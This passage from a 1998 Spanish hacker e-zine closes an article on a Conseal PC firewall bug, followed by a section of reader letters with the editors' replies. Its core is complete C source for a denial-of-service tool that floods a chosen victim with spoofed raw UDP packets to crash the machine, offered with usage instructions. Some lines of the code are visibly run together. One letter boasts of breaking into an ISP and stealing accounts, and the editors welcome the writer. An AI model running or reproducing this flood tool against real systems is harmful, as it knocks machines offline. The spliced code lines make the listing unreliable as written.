  6157.   "learning" y el "logging". Signal9 se habia dado cuenta de este fallo mucho
  6158.   antes de que incluso este ataque se "sacara al mercado", por eso ahora la
  6159.   gente puede comprarse el firewall y tenerlo actualizado y te olvidas de
  6160.   problemas. Y para aquellos que lo han usado con un crack o con un generador
  6161.   de llaves (key generator), deciros que no estais tan protegidos como
  6162.   deberiais.
  6163.  
  6164.   3.- Herramientas
  6165.   ----------------
  6166.  
  6167.   3.1.- Como funciona el programa
  6168.   -------------------------------
  6169.  
  6170.         La manera que este programa usa para colgar el ordenador puede ser:
  6171.  
  6172.         3.1.1.- Si el programa se esta ejecutando en modo "learning" se
  6173.   produce un flodeo y tratara todo el rato de escribir nuevas "rules"
  6174.   (reglas), esto provoca que use todos los recursos del ordenador y se
  6175.   cuelgue, e incluso un reseteo del ordenador.
  6176.  
  6177.         3.1.2.- Si esta usando el modo de "logging" de los ataques o de la
  6178.   informacion que pasa a traves del firewall, esto hara que por culpa del
  6179.   numero de paquetes de informacion que intenta escribir se cuelgue. 
  6180.  
  6181.   3.2.-Conseal.c
  6182.   --------------
  6183.  
  6184.         Este es el codigo fuente del programa que explota el bug:
  6185.  
  6186. ------------ Codigo Fuente ---------------------------------------------------
  6187.  
  6188. #include<sys/types.h>
  6189. #include<sys/socket.h>
  6190. #include<netinet/in_systm.h>
  6191. #include<netinet/in.h>
  6192. #include<netinet/ip.h>
  6193. #include<netinet/udp.h>
  6194. #include<errno.h>
  6195. #include<strings.h>
  6196. #include<netdb.h>
  6197. #include <stdlib.h>
  6198. #include<stdio.h>
  6199. #ifdef BROKEN_LIBC#include <arpa/inet.h>
  6200. #else
  6201. #define u_char unsigned char
  6202. #define u_short unsigned short
  6203. #endif
  6204. struct sockaddr sa;int 
  6205.  
  6206. main(int argc,char **argv)
  6207. {
  6208.  
  6209. int fd;
  6210. int x=1;
  6211. int hosti=192;
  6212. int hostii=168;
  6213. int hostiii=1;
  6214. int meep=0;
  6215. int fooport=1;
  6216. int numpack=0;
  6217. char funhost[15];
  6218. struct sockaddr_in *p;
  6219. struct hostent *he;
  6220.  
  6221. u_char gram[36]= 
  6222.  {
  6223.  0x45, 0x00, 0x00, 0x26,
  6224.  0x12, 0x34, 0x00, 0x00,
  6225.  0xFF, 0x11, 0, 0,
  6226.  0, 0, 0, 0,
  6227.  0, 0, 0, 0,
  6228.  
  6229.  0, 0, 0, 0,
  6230.  0x00, 0x12, 0x00, 0x00,
  6231.  
  6232.  '3','1','3','3','7','8','9','0'
  6233.  
  6234.  };
  6235.  
  6236. if(argc!=3)
  6237.  { 
  6238.  fprintf(stderr,"Saihyousen, by Noc-Wage\n");
  6239.  fprintf(stderr,"The faster your connection to the internet is
  6240.  (latencywise, not bandwidth)\n");
  6241.  fprintf(stderr,"and the lower the CPU speed of the victimwill\nincrease
  6242.  probability of success\n");
  6243.  fprintf(stderr,"usage: %s victim num_of_packets Ex: saihyousen127.0.0.1
  6244.  40000\n",*argv);
  6245.  exit(1);
  6246.  
  6247.  };
  6248.  
  6249. if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))== -1)
  6250.  { 
  6251.  perror("requires RAW SOCKETS");
  6252.  exit(1); 
  6253.  };
  6254.  
  6255. #ifdef IP_HDRINCL
  6256. if (setsockopt(fd,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0)
  6257.  {
  6258.  perror("setsockopt IP_HDRINCL");
  6259.  exit(1);
  6260.         };
  6261.  
  6262. #else
  6263.  
  6264. fprintf(stderr,"we don't have IP_HDRINCL :-(\n\n");
  6265. #endif
  6266.  
  6267. /* The stuff below is so that it's not fully sequential 
  6268.  i.e   100.100.100.101, 100.100.100.102  */
  6269.  
  6270. for (numpack=0;numpack<=atoi(argv[2]);numpack++)
  6271.  {
  6272.  if (meep==0) { ++hosti; meep++;
  6273.  }
  6274.  if (hosti>254) hosti=1;
  6275.  if (meep==1)
  6276.  {
  6277.  ++hostii; meep++;
  6278.  }
  6279.  if (hostii>254) hostii=1;
  6280.  if (meep==2) { ++hostiii; meep=0;
  6281.  }
  6282.  if (hostiii>254) hostiii=1;
  6283.  
  6284. sprintf( funhost, "%i.%i.%i.%i",hosti,hostii,hostiii,hosti);
  6285. (he=gethostbyname(funhost));
  6286. bcopy(*(he->h_addr_list),(gram+12),4);
  6287. if((he=gethostbyname(argv[1]))==NULL)
  6288.  {
  6289.  fprintf(stderr,"can't resolve destination hostname\n");
  6290.  exit(1);
  6291.  };
  6292.  
  6293. bcopy(*(he->h_addr_list),(gram+16),4);
  6294. fooport++;
  6295. /* resets the port to 1 if it's nearing the end of possible values */
  6296.  
  6297. if (fooport>65530) {fooport=1;};
  6298. *(u_short*)(gram+20)=htons((u_short)fooport);
  6299. *(u_short*)(gram+22)=htons((u_short)fooport);
  6300.  
  6301. p=(struct sockaddr_in*)&sa;p->sin_family=AF_INET;
  6302. bcopy(*(he->h_addr_list),&(p->sin_addr),sizeof(struct in_addr));
  6303. if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(structsockaddr
  6304. )))== -1)
  6305.  {
  6306.  perror("sendto");
  6307.  exit(1);
  6308.  };
  6309.  
  6310.  /*printf("Packet # %i\n", numpack); */
  6311.  /* Turn that on to see where you are.. it'll slow the attack though */
  6312.  
  6313.  };
  6314.  
  6315.  printf("Attack against %s finished", argv[1]);
  6316.  putchar('\n');
  6317.  return 1;
  6318.  
  6319. }
  6320.  
  6321. ------------ FIN -------------------------------------------------------------
  6322.  
  6323.   NOTA:
  6324.   -----
  6325.  
  6326.         Este programa deberia funcionar en cualquier plataforma Linux, no
  6327.   estoy seguro si chuta en FreeBSD, pero deberia, y si no trata de
  6328.   modificarlo a tu propio riesgo.
  6329.  
  6330.         Para una actualizacion de este firewall pasate por
  6331.   http://www.signal9.com. Esta version ya esta arreglada contra el bug :o).
  6332.  
  6333.         Si tienes algun comentario o lo que sea, mandame un par de lineas a:
  6334.   rolling_weables@hotmail.com y tratare de ayudarte :o).
  6335.  
  6336. <────────────────────────────────────────────────────────────────────────────>
  6337. ██████████████████████████████████████████████████████████████████████████████
  6338. <────────────────────────────────────────────────────────────────────────────>
  6339.  
  6340.                            ┌─────────────────┐
  6341.                           <  EL LECTOR OPINA  >
  6342.                            └─────────────────┘
  6343.  
  6344.         Deciros varias cosas que estamos viendo en la seccion del EL LECTOR
  6345.   OPINA, primero que no envies cosas que no hayais escrito vosotros sin la
  6346.   autorizacion del autor o por lo menos mantener los creditos, como a sucedido
  6347.   en el numero 6 que un lector envio un mail con un texto que se titulaba
  6348.   CARTA DEL JEFE INDIO y que resulto no ser suyo!! Si no sabes que decir,
  6349.   mejor no digas nada. Segundo, recibimos muchos articulos de gente que quiere
  6350.   escribir y nos dice si estamos interesados, la respuesta en SI, NO HACE
  6351.   FALTA QUE ENVIES UN MAIL PREGUNTADO, lo que teneis que hacer es escribir el
  6352.   articulo y enviarnoslo!!! Tercero, ahi gran cantidad de mail's que son
  6353.   realmente tontos, hemos dicho mil veces que no damos clases o sea que no
  6354.   hace falta que envies mail preguntando y tampoco hackeamos a peticion del
  6355.   lector o enviamos informacion. Con esto solo queremos decir que penseis que
  6356.   vais a decirnos antes de escribirnos!!!!!!
  6357.  
  6358.         Recomendamos leer nuestro FAQ.
  6359.  
  6360. <────────────────────────────────────────────────────────────────────────────>
  6361.  
  6362.   Date: Thu, 22 Oct 1998 19:36:16 GMT
  6363.   From: brownies@xxxxxxxxxxxxxx (Pedro Fried Reinitz)
  6364.   To: Subject: help me 
  6365.  
  6366.   Hola:
  6367.   Te escribimos desde chile para pedirte ayuda ya que estamos empezando o
  6368.   mejor dicho tratando de hacernos HAKERS.
  6369.   Te queriamos pedir ayuda con varias cosillas
  6370.   1.-como uno empieza (que programas etc)
  6371.   2.- me consegi linux y en realidad es mmmmm IMPOCIBLE a y
  6372.   3.- algun program para hacer logos como el de su coolisimo web (ej jjm
  6373.   them ...).
  6374.  
  6375.   te lo agradeseria mucho tus segidores chilenos .....
  6376.   pd: si puedes mandarme algunos txt etc y material util seria muy feliz...
  6377.   adios y gracias denuevo
  6378.  
  6379.   <------>
  6380.  
  6381.   [ Pues lo mismo de siempre, para comenzar es simple curiosidad, estudia
  6382.     todo lo que pase por tus manos, saca tus propias conclusiones y asi
  6383.     seras un Hacker. ]
  6384.  
  6385. <────────────────────────────────────────────────────────────────────────────>
  6386.   
  6387.   Date: Thu, 22 Oct 1998 09:42:13 GMT
  6388.   From: "Luis" <"luis@xxxxxxxxxxxxxx"@xxxxxxxxxxxxxx>
  6389.   To: Subject: necesito informacion 
  6390.  
  6391.   Me podrias ayudar con el desencriptador de claves John_15, que no tengo ni
  6392.   la mas minima idea de como usarlo. 
  6393.  
  6394.   Luis Esteban 
  6395.  
  6396.   <------>
  6397.  
  6398.   [ Te recomendamos el n6 de nuestro ezine, el cual se explica el uso del
  6399.     John The Ripper, entre otros :) ]
  6400.  
  6401. <────────────────────────────────────────────────────────────────────────────>
  6402.  
  6403.   Date: Wed, 21 Oct 1998 05:51:33 GMT
  6404.   From: Jesus Avila <avimolje@xxxxxxxxxxxxxx>
  6405.   To: jjf_team@usa.net Subject: Necesito ayuda. 
  6406.  
  6407.   Tengo un telefono movil. Un Nokia.
  6408.   El problema es que no me acuerdo del Pin number o codigo de acceso del 
  6409.   telefono. 
  6410.  
  6411.   El telefono es un NOKIA NK503 
  6412.   y el "type" es NHK-6RY 
  6413.   Existe alguna manera de crakear el telefono? 
  6414.  
  6415.   Muchas gracias 
  6416.   -- 
  6417.   Jesus Avila 
  6418.   BSc IT 
  6419.  
  6420.   == 
  6421.   Jesus Avila Molina 
  6422.   ETT esp. TELEMATICA 
  6423.   BSc INFORMATION TECHNOLOGY 
  6424.  
  6425.   <------>
  6426.  
  6427.   [ Leete el n6 de nuestro ezine y pasate por el web de CPNE, donde
  6428.     encontaras material muy interesante.
  6429.  
  6430.     http://cpne.islatortuga.com ]
  6431.  
  6432. <────────────────────────────────────────────────────────────────────────────>
  6433.  
  6434.   Date: Tue, 20 Oct 1998 19:22:25 GMT
  6435.   From: "SparK" <sparkboy@xxxxxxxxxxxxxx>
  6436.   To: Subject: Una pregunta 
  6437.  
  6438.   Hola equipo, les mando este mail porque quiero hacerles una pregunta...
  6439.   Soy un newbye que se esta guiando principalmente por sus e-zines y por las
  6440.   GTMHH de Carolyn Meinel, pero solo he encontrado los numeros 1, 2 y la
  6441.   mitad de la 3 en español.
  6442.   Le pregunte a la misma Carolyn donde los podia encontrar pero la respuesta
  6443.   que me dio (1/4 de linea) no me sirvio ya que ese servidor
  6444.   (uberhacker.islatortuga.com) no esta disponible.
  6445.   En fin, lo que quiero es saber si ustedes por favor me podrian mailear
  6446.   alguna direccion web o ftp para obtenerlas.
  6447.   Gracias
  6448.  
  6449.   <------>
  6450.  
  6451.   [ Pues ahora mismo no me acuerdo de ningun sitio en concreto pero pasate
  6452.     por Underhack o Iberhack. ]
  6453.  
  6454. <────────────────────────────────────────────────────────────────────────────>
  6455.  
  6456.   Date: Mon, 19 Oct 1998 14:38:27 GMT
  6457.   From: "alejandro andrade" <aandarde@xxxxxxxxxxxxxx>
  6458.   To: jjf_team@usa.net
  6459.   Subject: hola re quiero informancion si sepuede? 
  6460.  
  6461.   estoy llevando una investigacion en la escuela sobre los piratas en
  6462.   internet y en contre esta direccion asi que si podrian alguno de 
  6463.   ustedes mandarme algo de que por estan en la red ? por que lo 
  6464.   hacen , son un beneficio o un perjuisio quisiera saber mas sobre 
  6465.   ustedes lo poco de se de ustedes es por revista a si que espero que 
  6466.   me puedan dar esa informancion y si se puede ser como estedes 
  6467.  
  6468.   me despido esperando su repuestas 
  6469.  
  6470.   antetodo gracias
  6471.  
  6472.   <------>
  6473.  
  6474.   [ Primero no somos piratas, simplemente somos gente curiosa con ganas de
  6475.     explorar el mundo informatico. Nosotros investigamos y sacamos nuestros
  6476.     resultados, que pueden gustar o no pero eso no nos importa :) Claro que
  6477.     se puede ser como nosotros, pero ello con lleva mucho trabajo y ahi
  6478.     muy poca gente dispuesta a ello realmente. Leete nuestro FAQ. ]
  6479.  
  6480. <────────────────────────────────────────────────────────────────────────────>
  6481.  
  6482.   Date: Sat, 17 Oct 1998 09:35:41 GMT
  6483.   From: "Mauricio Espinoza Loma" <esplom@xxxxxxxxxxxxxx>
  6484.   Subject: Preguntas 
  6485.  
  6486.   solo tengio algunas preguntas
  6487.  
  6488.   - para que sirber el escanear una linea y scanear los puertos
  6489.   - Tambien quiero decir que no pude descomprimir el el escanaador de lineas
  6490.     de telefono
  6491.   Gracias...........
  6492.  
  6493.   <------>
  6494.  
  6495.   [ Escaner una linea?? Supongo que te refieres a un WarDialer, pues es un
  6496.     programa para buscar ordenadores conectados a la linea telefonica,
  6497.     mientras que un scaner de puertos es otro programa para saber que puertos
  6498.     tiene abiertos un sistema informatico.
  6499.     A que te refieres exactamente con que no pudistes descomprimir el
  6500.     programa ? ]
  6501.  
  6502. <────────────────────────────────────────────────────────────────────────────>
  6503.  
  6504.   Date: Sat, 17 Oct 1998 08:53:19 GMT
  6505.   From: "Mauricio E. L." <mauriciobo@xxxxxxxxxxxxxx>
  6506.   To: jjf_team@usa.net
  6507.   Subject: Entusiasta a hacker
  6508.  
  6509.   Mira solo tengo algunas preguntas que quisiera que me la
  6510.   respondieses??? 
  6511.  
  6512.   1.- Si un hacker es una persona mas estrictamente 
  6513.   programador y el contruye programas para interrumpir sistemas. 
  6514.   O si se vale de algunos defectos de los sistemas (ej: Unix 
  6515.   para interrumpir ese sistema.?? 
  6516.  
  6517.   2.- Quisiera que me ayudades a ser un hacker o a dar los 
  6518.   primeros pasos ??? 
  6519.  
  6520.   Mi nombre: Mauricuio 
  6521.   Edad: 20 
  6522.   carrera: Ingeieria de sistemas 
  6523.   Jobi : Programacion 
  6524.   Interes: Hackers 
  6525.  
  6526.   - Yo ya tube algunos buenos resultados el cual fue introducirme al servidor
  6527.   de un provedor de internet y sacar algunas cuentas ???? 
  6528.   Te agradeseria mucho si me pudieras ayudar, porque busque 
  6529.   un grupo como ustedes hace tiempo..?? 
  6530.  
  6531.   Luego quisiera colaborar con su grupo 
  6532.  
  6533.   <------>
  6534.  
  6535.   [ Un Hacker debe ser capaz de escribir sus propios programas y tambien debe
  6536.     ser capaz de explotar fallos en el sistema. Pues lee nuestro ezine que
  6537.     seguro que te sera de mucha ayuda :)
  6538.     Claro que puedes participar, escribe sobre algo que te guste y nos lo
  6539.     envias. ]
  6540.  
  6541. <────────────────────────────────────────────────────────────────────────────>
  6542.  
  6543.   Date: Wed, 14 Oct 1998 20:06:38 GMT
  6544.   From: "Lorena A" <alcaraz@xxxxxxxxxxxxxx>
  6545.   To: Subject: HELP! 
  6546.  
  6547.   Hola no se si sera posible lo que voy a pedir
  6548.   pero resulta que ayer por icq, un tipo me volvio loca mi compu, segun el
  6549.   poedia ver todos mis archivos, no tengo idea, como pudo pasar, ayer recibi
  6550.   archivos desde icq, los cuales ingenuamente instale, eran unos Nuketes,
  6551.   como genocide y ese estilo, puede que me haya entrando a mi sistema por
  6552.   emdio de eso?
  6553.   La cosa es que yo, verifique con todos los antivirus habidos y por haber, y
  6554.   no me encuentra nada,
  6555.   Asique por medio de un virus no entro.
  6556.   Yo quiero saber si me pueden aconsejar algo, apra protejerme.
  6557.   Bueno, si pueden contestarme se los agradesco. 
  6558.   Saludos
  6559.   Lorena.
  6560.  
  6561.   <------>
  6562.  
  6563.   [ Pues seguramente te habra metido en uno de esos nukes el BO (Back Orifice)
  6564.     o el Netbus, los cuales permite controlar un ordenador remotamente.
  6565.     Estos programas solo son dectados por pocos programas especificos por eso
  6566.     tus AV (AntiVirus) no han encontrado nada. Nosotros estamos trabajando en
  6567.     una herramienta que elimine el BO, pero mientras tanto, te remito a esta
  6568.     herramienta, la cual te sera muy util:
  6569.  
  6570.     http://www.genocide2600.com/~tattooman/new-uploads/boe.exe ]
  6571.  
  6572. <────────────────────────────────────────────────────────────────────────────>
  6573.  
  6574.   Date: Wed, 14 Oct 1998 06:52:18 GMT
  6575.   From: Antonio Moreno <paj@xxxxxxxxxxxxxx>
  6576.   To: jjf_team@usa.net
  6577.   Subject: FAVOR 
  6578.  
  6579.   Hola! Soy un estudiante de InformAtica de GestiOn de primer año, y os
  6580.   escribo para saber si me podOis hacer un favor. Resulta que hay muchos
  6581.   amigos mios (incluso yo) que desean que no existiera la siguiente pagina.
  6582.   Gracias y espero que podeis ayudarme. Confio en vosotros. Espero que podais
  6583.   hacerlo cuanto antes. Ya segui las instrucciones de un fichero para obtener
  6584.   el password, pero no me ha funcionado. No lo entiendo. Siento no saber nada
  6585.   de Unix. Gracias anticipadas y hasta la proxima conexion! Saludos desde
  6586.   Murcia.
  6587.  
  6588.   <------>
  6589.  
  6590.   [ Sorry, pero no nos dedicamos a atacar servidores a peticion de los
  6591.     lectores. Leete el FAQ. ]
  6592.  
  6593. <────────────────────────────────────────────────────────────────────────────>
  6594.  
  6595.   Date: Tue, 13 Oct 1998 15:32:36 GMT
  6596.   From: JROBLES <JROBLES@xxxxxxxxxxxxxx>
  6597.   To: jjf_team@usa.net
  6598.   Subject: No consigo bajar el numero 6 
  6599.  
  6600.   Amigos del JJF, me dispongo como siempre a bajarme el ultimo numero
  6601.   de vuestro E-Zine, pero se me para de cargar en el articulo de Linux; lo 
  6602.   he intentado varias veces pero no consigo bajarmelo entero. 
  6603.   Os agradeceria me lo mandaseis por correo a mi e-mail 
  6604.   GRACIAS 
  6605.  
  6606.   <------>
  6607.  
  6608.   [ Pasate por nuestro FTP, que alli lo bajaras sin problema :) y si no
  6609.     ponte encima del link y pulsa el boton derecho y dale para salvar el
  6610.     fichero :) ]
  6611.  
  6612. <────────────────────────────────────────────────────────────────────────────>
  6613.  
  6614.   Date: Sun, 11 Oct 1998 09:16:20 GMT
  6615.   From: Lau <lau.x@xxxxxxxxxxxxxx>
  6616.   Subject: Ayudita ! 
  6617.  
  6618.   Hola soy Lau y tengo un problemita, en realidad no se si es un problema, te
  6619.   cuento en el chat un pibe me paso el siguiente programa: Back Orifice, me
  6620.   dijo que era algo asφ como un icq, pero nada que ver, con eso tiene control
  6621.   sobre mi compu, por un lado me gust≤ todo lo que pudo hacer Θl desde su casa
  6622.   y por otro no me gusta que tenga acceso a mi compu, quΘ hago, ayudame porfi. 
  6623.   Estuve leyendo tus articulos, quiero aprender todo lo que esta en la pagina
  6624.   de hackers, me gusta, pero para eso primero quiero librarme de ese tipo,
  6625.   como hago, ayudame!!!!!! 
  6626.  
  6627.   Lau 
  6628.  
  6629.   Lau... desde Argentina 
  6630.  
  6631.   <------>
  6632.  
  6633.   [ Eso es un programa para controlar un ordenador remotamente. Te
  6634.     recomendamos que utilizes esta herramienta:
  6635.  
  6636.     http://www.genocide2600.com/~tattooman/new-uploads/boe.exe ]
  6637.  
  6638. <────────────────────────────────────────────────────────────────────────────>
  6639.  
  6640.   Date: Sun, 04 Oct 1998 14:27:25 GMT
  6641.   From: <intrepido@xxxxxxxxxxxxxx>
  6642.   Subject: hola 
  6643.  
  6644.   la pagina es una maza me gustaria saber con que programa la crean y donde
  6645.   los puedo conseguir desde ya gracias.
  6646.  
  6647.   <------>
  6648.  
  6649.   [ Pues facil, Notepad (Viene con el Win95/98/NT :) Rulez y las fabulosas
  6650.     manos de Mac Crack. ]
  6651.  
  6652. <────────────────────────────────────────────────────────────────────────────>
  6653.  
  6654.   Date: Sun, 04 Oct 1998 11:23:31 GMT
  6655.   From: Abel Larrama <alarrama@xxxxxxxxxxxxxx>
  6656.   To: jjf_team@usa.net
  6657.   Subject: desde uruguay. 
  6658.  
  6659.   Hola a quien corresponda. Como dice el asunto soy un chico de uruguay
  6660.   que tengo 17 años, me encanta todo sobre computadoras, aunque me doy 
  6661.   cuenta que no se casi nada, recien me inicio en el mundo de la red y me 
  6662.   interesa saber toda informacion sobre hackers y crackers, me refiero a 
  6663.   ustedes con el motivo de saber si me podrian ayudar porque quisas por 
  6664.   ignorancia y aprendisaje me he vajado un archivo que dejo un bugs por el 
  6665.   cual entra en mi pc un hack que no me deja aprender tranqui, no me 
  6666.   molesta pero quiero saber cosas sobre ellos y como ser uno para poder 
  6667.   evitarlos, no se como podre arreglar eso quisas con un format de disco, 
  6668.   ya vere, me gusta lo que ustedes hacen y tambien me gustaria que me 
  6669.   pudieran ayudar si no es mucha molestia, aunque sea un poco para poder 
  6670.   prevenirme y saber algo mas de este fantastico mundo del pc y la net. 
  6671.   Sin mas me retiro, agradeciendoles de ante mano. 
  6672.  
  6673.   ABEL LARRAMA 
  6674.   PD: por favor contesten esta carta mi nick es Jeque. 
  6675.  
  6676.   <------>
  6677.  
  6678.   [ Para eso esta este ezine, para aprender todos :) ]
  6679.  
  6680. <────────────────────────────────────────────────────────────────────────────>
  6681.  
  6682.   Date: Thu, 01 Oct 1998 15:37:16 GMT
  6683.   From: <drslump@xxxxxxxxxxxxxx>
  6684.   To: JJF Hacker Team
  6685.  
  6686.   Holas!
  6687.  
  6688.   Bueno, pues escribo esta critica a ver si vuestras mercedes conceden a 
  6689.   ponerla en el ezine :)) 
  6690.  
  6691.   Bien, esto es un escrito para los hacker-wannabes que no son mas que esos, 
  6692.   no me considero, ni probablemente llegue a serlo nunca, un hacker, pero 
  6693.   lejos de eso , tampoco me considero un paleto que quiere llegar a ser 
  6694.   hacker, pero que no quiere dejar su windows95 porque mola mas. 
  6695.   Bueno, empiezo mi caotica critica a raiz de una discusion tenida por la 
  6696.   *excelente* Vampire BBS. 
  6697.   Creo que todo empezo cuando Wintermute ( hola Winter :) ) paso un forward 
  6698.   del archifamoso texto de "linuxeros rules", ese en el que los linuxeros que 
  6699.   no tienen ni puta idea usan linux porque "rules" y es guay .... 
  6700.   Bien, todos los que andan por alli (y los que me conozcan) saben que soy un 
  6701.   acerrimo defensor del linux, y entonces no pude reprimirme y salto cagandome 
  6702.   en la madre que pario al que escribio el texto ese. Bueno , entonces Dairo, 
  6703.   Winter, BitSpawn y no recuerdo quien mas, me dijeron que ese texto estaba 
  6704.   dirigido a la bella poblacion de subnormales que dicen que "linux rules" 
  6705.   pero que no lo han probado en su vida. 
  6706.   Bueno, el caso es que yo no habia conocido a nadie de ese tipo de gente, y 
  6707.   realmente, no creia que existiera, pero el otro dia, me encontre con uno de 
  6708.   ellos, que tiene internet y "esta harto del windows 95 y a ver si le paso el 
  6709.   linux porque es el mejor sistema operativo que hay, por cierto funcionan 
  6710.   todos los programas de windows en linux?" 
  6711.  
  6712.   AAAAAAAAAAAAAAAAAAARRRRRRRRRRGHHHHHHHHHHHHHHHHHHHHHHHH 
  6713.  
  6714.   Bien, pido disculpas a todos los de Vampire por mi error, ya que gilipollas 
  6715.   hay en cada calle :( 
  6716.   Bueno, a que viene todo esto? 
  6717.   Pues viene a que estoy hasta los cojones de ver a la gente decir "quiero ser 
  6718.   hacker, se puede hackear con windows ?" y demas polleces. 
  6719.   Alguien con espiritu de hacker, probara lo nuevo, le gusta investigar, y 
  6720.   alguien que cumple esto, se merece mi respeto , independientemente de los 
  6721.   conocimientos que tenga, para mi un hacker es alguien que explora y descubre 
  6722.   cosas nuevas (Cain, tu SI eres un verdadero hacker), y no un payaso que
  6723.   quiere entrar en otro ordenador para demostrar lo cool que es a sus amigos. 
  6724.   "Me tengo que poner linux para ser un hacker?" 
  6725.   Cuantos habeis oido/leido esto? 
  6726.   Supongo que muchos, bien, yo intentare contestar la pregunta: 
  6727.   -No tienes que ponerte linux para ser un hacker, sino que hasta que no 
  6728.   indagues por tu cuenta, pongas empeño en satisfacer tu curiosidad, y no en 
  6729.   "ser un hacker" o en que la gente piense que eres cool, no seras nunca ni un 
  6730.   intento de hacker. 
  6731.   Tengo las ideas embotadas, una rabia increible las aprieta todas y las
  6732.   atasca en la salida, son tantas que no las puedo expresar con palabras (y si
  6733.   le sumamos que me consideran subnormal, pues estamos apañaos). 
  6734.  
  6735.   Lo que intento decir es que un usuario convencido de Windows no puede ser 
  6736.   nunca alguien a quien le gusta la informatica (o francamente, tiene un gusto 
  6737.   pesimo), o alguien curioso. Alguien que se resiste a saltar a linux no es 
  6738.   curioso, y lo que realmente quiero decir es que alguien asi no llegara nunca 
  6739.   a ser un hacker, sino que perecera en el intento de parecerlo. 
  6740.   Me suena eso de leer a ciert@/s individu@/s por la IRC decir "ahora estoy 
  6741.   con windows pq me ha petado el linux" o " es que estoy probando el windows 
  6742.   98, pero siempre uso linux" y ese windows parece que dura siempre, o sea, 
  6743.   que se ve a 1000 leguas que es otro hacker wannabe. 
  6744.   Probablemente conozcais al personajillo en cuestion, pero hay mas como el, 
  6745.   que presumen de ser "hackers" y de haber entrado en sitios, cuando realmente 
  6746.   te das cuenta de que no tienen ni idea, y de que incluso YO se mas que 
  6747.   ellos. Como alguien asi puede pasearse impunemente por la IRC? Es increible 
  6748.   la de gilipollas que hay por ahi sueltos, pero bueno. 
  6749.   Esto simplemente intenta ser algo que les haga desistir antes de darme mas 
  6750.   asco de la condicion humana en general, puesto que demuestran su egolatria, 
  6751.   y cuantos egolatras andan por ahi sueltos. Es que lo cojonudo es que no les 
  6752.   basta con intentar ser algo que nunca seran, sino que se las dan de lo que 
  6753.   no son. 
  6754.   Un hacker nace curioso. Yo no soy hacker, pero espero llegar a tener al 
  6755.   menos cierto conocimiento sobre el tema con el paso del tiempo, y tengo la 
  6756.   esperanza puesto que he sido siempre muy curioso, pero gente del tipo 
  6757.   "instalame el linux, ya sabes como lo quiero, preparamelo para tirar a la 
  6758.   gente y para hackear" te dejan la moral por los suelos. 
  6759.   Bueno, creo que poco mas que decir queda, creo que mas o menos me he 
  6760.   expresado bien y mis sentimientos han quedado minimamente reflejados. 
  6761.  
  6762.   Saludo desde aqui a mi novia, que hace posible que siga viviendo, a
  6763.   - J.J.F. / Hackers Team -, a Phuck Systems (en especial a Gabber, que
  6764.   aguanta tanto con el camion), a Enif, que me enseña cosas, a OiOiO, que me
  6765.   aguantan en el grupo, y a #rjn , Vampire BBS, a (casi) toda la gente de
  6766.   Fido y Subnet, a Sanity, Nobody, DarkBlack a Koji y a la vaca que rie.
  6767.   Muuuuuuuuuuuuuuuuuuuuuuuuuu
  6768.  
  6769.   ----- 
  6770.   Bueno, eso es todo. Estaba como que mosqueado por este tipo de gente, 
  6771.   vosotros direis si lo poneis o no ..... :) 
  6772.  
  6773.   See you ... Dr Slump 
  6774.  
  6775.   OiOiO! 
  6776.  
  6777.   <------>
  6778.  
  6779.   [ Estas cosas pasan y gente inutil ahi por todo el cyberespacio,
  6780.     recomendado leer el articulo de Tasslehoff, incluido en este numero,
  6781.     para salir de dudas sobre el tema, que es un Hacker realmente :) ]
  6782.  
  6783. <────────────────────────────────────────────────────────────────────────────>
  6784.  
  6785.   Date: Wed, 30 Sep 1998 17:00:52 GMT
  6786.   From: "Diego Jordan Garica Garica" <maoma@xxxxxxxxxxxxxx>
  6787.   To: jjf_team@usa.net Subject: 
  6788.  
  6789.   Buenas soy un novicio en esto del hacking y demas y antes de
  6790.   empezar quiero estar bien enterado para que no me den 
  6791.   grandes palos! ni me puteen mucho, en la carta que os 
  6792.   qescribo queria pediros dos cosas: 
  6793.  
  6794.   1.- Si me podrias mandar todas vuestras revistas comprimidas 
  6795.   en un archivo zip 
  6796.  
  6797.   2.- De dodne me puedo bajar o consegui en unix o linux! si 
  6798.   acaso se diferencian algo estos dos programas! y ya 
  6799.   encotrare yo las guias de como usarlos! 
  6800.  
  6801.   Bueno sin nada mas os dejo..espero vuestra contestacion! 
  6802.  
  6803.   <------>
  6804.  
  6805.   [ Sorry, pero nosotros no enviamos nada a nadie. Linux es distribuido en
  6806.     muchas revistas de informatica. Leer FAQ. ]
  6807.  
  6808. <────────────────────────────────────────────────────────────────────────────>
  6809.  
  6810.   Date: Fri, 25 Sep 1998 16:05:12 GMT
  6811.   From: "ZeD" <j172201503@xxxxxxxxxxxxxx>
  6812.  
  6813.   creo que deberiais comprimir lo po que yo por lo menos no soy capaz de
  6814.   bajarlo me lo podriais mandar a este e-mail? 
  6815.   ZeD@xxxxxxxxxxxxxx 
  6816.   seria un detalle por cierto muchas gracias por publicar tan pronto los
  6817.   articulos que os mande gracias de veras 
  6818.   byez 
  6819.  
  6820.   http://www.angelfire.com/ak/HACKZED/ZED2.html 
  6821.   http://come.to/HaCkS-WeB-RiNg 
  6822.   !!visitalasíí 
  6823.  
  6824.   <------>
  6825.  
  6826.   [ Pasate por nuestro FTP que alli encontaras el ezine :)
  6827.     Dnd, un placer. ]
  6828.  
  6829. <────────────────────────────────────────────────────────────────────────────>
  6830.  
  6831.   Date: Thu, 24 Sep 1998 00:50:38 GMT
  6832.   From: root <letal@xxxxxxxxxxxxxx>
  6833.   To: jjf_team@usa.net
  6834.   Subject: Libro LINUX 
  6835.  
  6836.   Hola mushashos, vi con agrado que salio mi nota. Les cuento que estoy en
  6837.   un proyecto mas ambisioso. Estoy trabajando en un libro de Linux para 
  6838.   principiantes. En cuanto lo termine que calculo sera en un par de 
  6839.   semanas se los mando para que lo pongan el su page. 
  6840.  
  6841.   Suerte y hasta la proxima. 
  6842.  
  6843.   <------>
  6844.  
  6845.   [ Pues estamos ansiosos por ver ese libro sobre Unix, y si necesitas ayuda
  6846.     puedes contar con nosotros :) ]
  6847.  
  6848. <────────────────────────────────────────────────────────────────────────────>
  6849.  
  6850.   From: <delaosapavon@xxxxxxxxxxxxxx>
  6851.   Subject: BUSQUEDA DE DRIVERS PARA CD-ROM 32X (CONEXION POR PUERTO PARALELO)
  6852.            PARA LINUX áááá
  6853.  
  6854.   Hola a todos:
  6855.  
  6856.   Bueno, antes de nada felicitaciones por vuestro trabajo desinteresado en 
